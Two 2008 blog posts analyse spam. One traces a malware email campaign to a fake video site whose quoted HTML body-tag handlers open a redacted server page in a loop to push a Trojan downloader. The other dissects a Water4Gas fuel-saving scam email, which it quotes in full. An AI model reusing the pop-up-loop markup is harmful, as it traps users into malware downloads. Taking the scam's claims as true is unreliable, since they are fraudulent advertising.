New malware outbreak tries to infect your computer with Trojan.Downloader

June 19, 2008 Leave a Comment

The latest malware outbreak sends emails with subject lines such as: Paris Hilton found to be gay!, China Earthquake claims 1 million lives, Star Trek star dies at age 79, Man wakes up from 40 year coma, Batman latest movie bombs at box office or Italy knocked out of Euro 2008 tries to attract us. So far, over 500 emails have been intercepted within 40 minutes.

The email content is on two lines only. Content can be anything like “Don’t belittle the effects of power enlargement” to “Don’t make the postman make too many attempted deliveries to get you the herbal solution that will change your life” or “Heir to Prada empire found strangled”. The malicious link is in the format of http://****.de/r.html and this will redirect you to PornTube, a YouTube design ripp off.

And no, we are not giving you a full screenshot of this web site. ;-)

Once you get there, a link behind the scenes is made to a server IP xx.xxx.xx.xx/index.php with some scripting in the HTML body tag: <body onbeforeunload=”window.open(‘http://xx.xxx.xx.xx/index.php’);” onunload=”window.open(‘http://xx.xxx.xx.xx/index.php’);” onclose=”window.open(‘http://xx.xxx.xx.xx/index.php’);” id=”mainbody”>

With this connection will try to download the file video.exe directly to your computer. Some pop up windows will appear stating that you need to download an ActiveX Object to run the videos and it doesn’t matter if you click Cancel or No, you get stuck in a loop until you download the video.exe. Closing down your windows or browser is the only option. Andf you get a new browser window opening the browser at this server again.

As far as I investigated this for now, it appears that the URLs http://****.de/r.html used in this malware outbreak, which are changing quite rapidly, could be in fact hacked servers hosting valid web sites where the r.html file is placed in the web hosting root of the site. Some images are missing and that’s why the design of PornTube isn’t exactly like the design of YouTube.  The IP address is according to a WHOIS registered in Amsterdam, The Netherlands. The video.exe is a variant Trojan.Downloader.Win32Agent.tyw.

Filed under Uncategorized Tagged with , , , ,

High oil prices inspire spammers

June 19, 2008 Leave a Comment

Even spammers have noticed the high oil prices and are offering really good deals.

Hi Emarketer,
 
With over 20,000 satisfied customers worldwide and 900 registered manufacturers, Water4Gas is quickly becoming the web’s standard for DIY technology to save fuel using WATER!
 
Water4Gas is running a limited-time F’ree Gift at

http://www.*****.com/cgi-bin/arp3/arp3-t.pl?l=101&c=2799118

 
They are offering a 7-day e-mail course so you can learn this in your spare time, daily. This course is normally priced at $49.95 but FOR A LIMITED TIME ONLY are giving it away FREE to a limited number of students. (Deadline unknown, may disappear any moment.)

You do NOT have to buy anything or answer any questions!!! I just want you to have this information. Each lesson is easy and short. In about 10 minutes a day you will discover the simplicity and power of using water to clean emissions and save tons of fuel in your car or truck.

Also in this course: ways to MAKE MONEY from this!

If you’ve been searching for a unique way to SAVE $$$ ON FUEL, grab this f’ree deal – perfect for this time of rising gas costs:

http://www.*****.com/cgi-bin/arp3/arp3-t.pl?l=101&c=2799118

 
 
Happy Mileage!

Gerald Aumaugher
gerald@aumaugher.us
251 CR 2603
Pittsburg, TX
903-231-4040

As you may know already, I never follow the complete URLs they provide me in the spam. I love to take a look around on their server. The domain www.*****.com just contains the text “Placeholder for *****.com”.

Following the complete link we get to http://******.info/water4fuel.

When looking further on http://******.info/index.php I get a web site with the title Spider Web Marketing. The site contains some articles regarding this this Water4Gas promo and it seems like there are more promotions and email campaigns texts as well from the past. Okay, back to the main objective.

A very loveley Rachel welcomes you as a visitor on runyourcaronwater.com. The URLs mentioned doesn’t match quite well. But that’s a minor issue.

Looks very promising, no more high priced fuel needed but just water to keep on driving. “Create your own water hybrid for under $150!”. Let’s read further. I only need approx less than $60 on raw materials and the price of all this is at the bottom of the page. Let’s keep on scrolling further down and there we have it. The regular value is $297 dollars but we can get it at $49,97. What a saving!

Too good to be true if you ask me.

Filed under Spam Tagged with , , ,

Follow

Get every new post delivered to your Inbox.

Join 109 other followers